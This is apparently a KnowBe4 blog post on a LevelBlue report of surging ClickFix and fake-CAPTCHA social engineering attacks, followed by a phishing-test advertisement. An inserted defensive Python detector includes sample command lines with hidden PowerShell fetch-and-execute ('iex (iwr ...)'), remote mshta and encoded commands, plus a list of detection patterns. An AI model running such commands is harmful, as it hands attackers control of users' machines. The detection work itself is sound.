Social Engineering Attacks Surged in the First Half of 2025

KnowBe4 Team | Aug 6, 2025

Cybersecurity incidents nearly tripled in the first half of 2025, jumping from 6% in the second half of 2024 to 17% in 2025, according to a new report from LevelBlue.

Business email compromise (BEC) remains the most common method for initial access, but non-BEC tactics rose by 214%. The researchers observed a major surge in social engineering attacks, driven by the recent popularity of the ClickFix tactic.

“The LevelBlue Threat Trends Report found a massive uptick in social engineering attacks, accounting for 39% of initial access incidents observed during the first half of the year,” the researchers write.

“This can be attributed to the increasing number of fake CAPTCHA social engineering attacks, especially ClickFix campaigns, which jumped 1,450% from the second half of 2024 to the first half of 2025. These attacks leverage user trust and urgency to easily gain access to organizations’ networks.”

ClickFix is a relatively new tactic that tricks users into running malicious commands on their computers.

“ClickFix lures users with fake system messages or alert pop-ups prompting them to ‘fix’ a purported issue by clicking a button or downloading a suspicious utility,” the researchers explain. “Fake CAPTCHA masquerades as a CAPTCHA verification page, prompting users to interact with keyboard input as part of a fake bot-detection challenge. These tactics create a false sense of legitimacy and cause the user to unintentionally execute attacker-controlled scripts.”
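Because the lure ends with the user pasting and running an attacker-supplied command, the observable artifact on the endpoint is a script host started from a user-facing program with a command line that fetches or decodes remote content. The following Python snippet is an added example written for this article, not code from the LevelBlue report or from KnowBe4. It assumes process-creation telemetry that records parent image, child image and command line (as Sysmon or most EDR products emit), and the choice of "user launcher" parents (browsers plus explorer.exe for the Run dialog) and command-line indicators are detection heuristics chosen here, not details given in the report. The sample events are constructed.

```python
"""Flag ClickFix-style executions in process-creation events.

Heuristic (an assumption of this example, not from the report):
a script host started by a browser or by explorer.exe, whose command
line also carries at least one fetch/decode/hide indicator.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple

# Child images worth inspecting: script hosts commonly abused to run pasted commands.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Parents that indicate a user-driven launch (browser or the Win+R Run dialog,
# which appears as explorer.exe). Assumed for this example.
USER_LAUNCHERS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe",
                  "brave.exe"}

# Command-line indicators, each paired with a human-readable reason.
SUSPICIOUS_TOKENS = [
    (r"\biex\b|invoke-expression", "inline expression execution"),
    (r"\b(iwr|invoke-webrequest|curl|wget|downloadstring)\b", "remote content fetch"),
    (r"https?://", "URL in command line"),
    (r"-e(nc|ncodedcommand)?\b", "encoded command"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
]

# Constructed sample events: (parent image, child image, child command line).
SAMPLE_EVENTS: List[Tuple[str, str, str]] = [
    ("chrome.exe", "chrome.exe", "chrome.exe --type=renderer"),
    ("explorer.exe", "powershell.exe",
     'powershell.exe -NoProfile -WindowStyle Hidden -Command '
     '"iex (iwr http://example.invalid/verify)"'),
    ("explorer.exe", "mshta.exe", "mshta.exe http://example.invalid/captcha.hta"),
    ("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\alice\\notes.txt"),
    ("msedge.exe", "cmd.exe", "cmd.exe /c powershell -enc BASE64_PLACEHOLDER"),
    ("code.exe", "powershell.exe", "powershell.exe -NoProfile -File build.ps1"),
]


@dataclass
class Finding:
    parent: str
    child: str
    reasons: List[str]


def analyze(parent: str, child: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding when the event matches the ClickFix-style pattern."""
    parent_l, child_l, cmd_l = parent.lower(), child.lower(), cmdline.lower()
    if child_l not in SCRIPT_HOSTS:
        return None
    # Lineage is mandatory: a script host launched from a developer tool or a
    # scheduler is routine; one launched from a browser or the Run dialog is not.
    if parent_l not in USER_LAUNCHERS:
        return None
    reasons = [f"script host spawned by {parent_l}"]
    for pattern, label in SUSPICIOUS_TOKENS:
        if re.search(pattern, cmd_l):
            reasons.append(label)
    # Require lineage plus at least one command-line indicator to cut noise
    # from users legitimately opening a shell from explorer.exe.
    if len(reasons) < 2:
        return None
    return Finding(parent_l, child_l, reasons)


def scan(events: Sequence[Tuple[str, str, str]]) -> List[Finding]:
    """Run analyze() over a batch of events and keep only the hits."""
    hits = []
    for parent, child, cmdline in events:
        finding = analyze(parent, child, cmdline)
        if finding is not None:
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit.parent} -> {hit.child}: {', '.join(hit.reasons)}")
```

Run against the constructed events, the detector flags the three pasted-command launches (PowerShell and mshta from explorer.exe, cmd/PowerShell from the browser) and ignores the renderer process, the text editor and the PowerShell build script started by a development tool. In production the same logic would read Sysmon Event ID 1 or EDR process events, and the parent set should be extended to whatever a given estate uses to reach the Run dialog or the clipboard.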

LevelBlue also warns that AI is increasing attackers’ efficiency and speeding up cyberattacks. New-school security awareness can provide an essential layer of defense against these incidents.

“What’s especially concerning is how fast attackers are moving,” the report says. “Breakout times are shrinking, and threat actors are moving laterally faster than ever. It’s a clear sign that attackers are getting more efficient — and more dangerous. This is why it’s critical for security teams to double down on cyber education and awareness training. If your training hasn’t covered the latest social engineering tricks, now’s the time to review and update it. At the end of the day, your people are still your first line of defense.”

KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.

LevelBlue has the story.


Free Phishing Security Test

Would your users fall for convincing phishing attacks? Take the first step now and find out before bad actors do. Plus, see how you stack up against your peers with phishing Industry Benchmarks. The Phish-prone percentage is usually higher than you expect and is great ammo to get budget.

Here's how it works:

  • Immediately start your test for up to 100 users (no need to talk to anyone)
  • Select from 20+ languages and customize the phishing test template based on your environment
  • Choose the landing page your users see after they click
  • Show users which red flags they missed, or a 404 page
  • Get a PDF emailed to you in 24 hours with your Phish-prone % and charts to share with management
  • See how your organization compares to others in your industry

Go Phishing Now!

PS: Don't like to click on redirected buttons? Cut & Paste this link in your browser:

https://www.knowbe4.com/phishing-security-test-offer
